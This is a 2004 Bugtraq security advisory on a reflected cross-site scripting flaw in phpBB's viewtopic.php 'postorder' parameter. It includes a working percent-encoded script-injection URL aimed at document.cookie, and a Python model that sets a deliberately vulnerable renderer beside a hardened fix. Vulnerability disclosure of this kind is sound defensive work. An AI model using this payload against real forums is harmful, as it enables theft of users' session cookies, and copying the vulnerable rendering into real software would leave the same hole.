List: bugtraq
Subject: New phpBB ViewTopic.php Cross Site Scripting Vulnerability
From: Cheng Peng Su <apple_soup () msn ! com>
Date: 2004-02-28 15:09:02
Message-ID: 20040228150902.22283.qmail () www ! securityfocus ! com
################################################
Advisory Name: New phpBB ViewTopic.php Cross Site Scripting Vulnerability
Release Date: Feb 29, 2004
Application: phpBB
Platform: PHP
Version Affected: the latest version
Vendor URL: http://www.phpbb.com/
Discoverer: Cheng Peng Su (apple_soup_at_msn.com)
################################################
Details:
This vulnerability is similar to Arab VieruZ's advisory 'XSS bug in phpBB'; this time the problem is not in the 'highlight' parameter but in 'postorder'. We can inject HTML code, and such code could be used to steal cookie information.
Proof of Concept:
If there is a topic at
http://site/phpBB/viewtopic.php?t=123456
this page can also be viewed at
http://site/phpBB/viewtopic.php?t=123456&postorder=asc
and the page will then contain markup like the following:
<a class="maintitle" href="viewtopic.php?t=176994&start=0&postdays=0&postorder=asc&highlight=">[Topic Title]</a>
phpBB does not filter illegal characters out of 'postorder'; the value is reflected verbatim inside the href attribute, so we can inject HTML code after 'postorder='.
Exploit:
URL: http://site/phpBB/viewtopic.php?t=123456&postorder=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C
Note that unescape('%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C') == '"><script>alert(document.cookie)</script><'. The leading '">' closes the href attribute and the <a> tag, so the <script> element that follows is parsed as markup rather than as part of the URL.
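The reflection described above, modelled as an added Python example that is not phpBB's code: render_link_vulnerable() pastes the decoded 'postorder' and 'highlight' values into the href attribute the way the captured markup shows, render_link_fixed() is a hypothetical hardened version that restricts 'postorder' to its two legal values and URL-encodes then HTML-escapes the whole query string, and injected_script_tags() counts the <script> start tags a tokenizer sees in the result. The payload is the percent-encoded value from the exploit URL; the function and constant names are assumptions of this example.

```python
"""Model of the viewtopic.php 'postorder' reflection (constructed example,
not phpBB's own code)."""
import html
from html.parser import HTMLParser
from urllib.parse import unquote, urlencode

# The percent-encoded value from the advisory's exploit URL (after 'postorder=').
PAYLOAD_RAW = (
    "%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E"
    "%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C"
)

# Hypothetical whitelist: the only values viewtopic.php has a use for.
ALLOWED_POSTORDER = ("asc", "desc")


def decode_query_value(raw):
    """What the web server hands the script: the percent-decoded value."""
    return unquote(raw)


def render_link_vulnerable(topic_id, postorder, highlight=""):
    """Hypothetical vulnerable rendering: raw query values land inside href."""
    return (
        f'<a class="maintitle" href="viewtopic.php?t={topic_id}&start=0'
        f'&postdays=0&postorder={postorder}&highlight={highlight}">'
        f'[Topic Title]</a>'
    )


def render_link_fixed(topic_id, postorder, highlight=""):
    """Hardened rendering: whitelist postorder, percent-encode every query
    value, then HTML-escape the whole attribute ('&' becomes '&amp;')."""
    if postorder not in ALLOWED_POSTORDER:
        postorder = "asc"
    query = urlencode({
        "t": int(topic_id),       # must be an integer; raises on junk
        "start": 0,
        "postdays": 0,
        "postorder": postorder,
        "highlight": highlight,   # urlencode percent-encodes '"', '<', '>'
    })
    return (
        f'<a class="maintitle" href="viewtopic.php?{html.escape(query)}">'
        f'[Topic Title]</a>'
    )


class _TagCollector(HTMLParser):
    """Records every start tag the tokenizer emits."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def injected_script_tags(markup):
    """Count <script> start tags in the rendered markup; anything above
    zero means the attribute value was broken out of."""
    parser = _TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags.count("script")


if __name__ == "__main__":
    payload = decode_query_value(PAYLOAD_RAW)
    print("decoded payload:", payload)
    for name, render in (("vulnerable", render_link_vulnerable),
                         ("fixed", render_link_fixed)):
        markup = render(123456, payload)
        print(f"{name}: {injected_script_tags(markup)} injected <script> tag(s)")
        print("   ", markup)
```

The same payload placed in 'highlight' instead of 'postorder' breaks out of the vulnerable link the same way, which is the earlier advisory's case; the fixed renderer neutralises both because it encodes the values rather than relying on the whitelist alone.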
Contact:
Cheng Peng Su
apple_soup_at_msn.com
Class 1,Senior 2,High school attached to Wuhan University
Wuhan,Hubei,China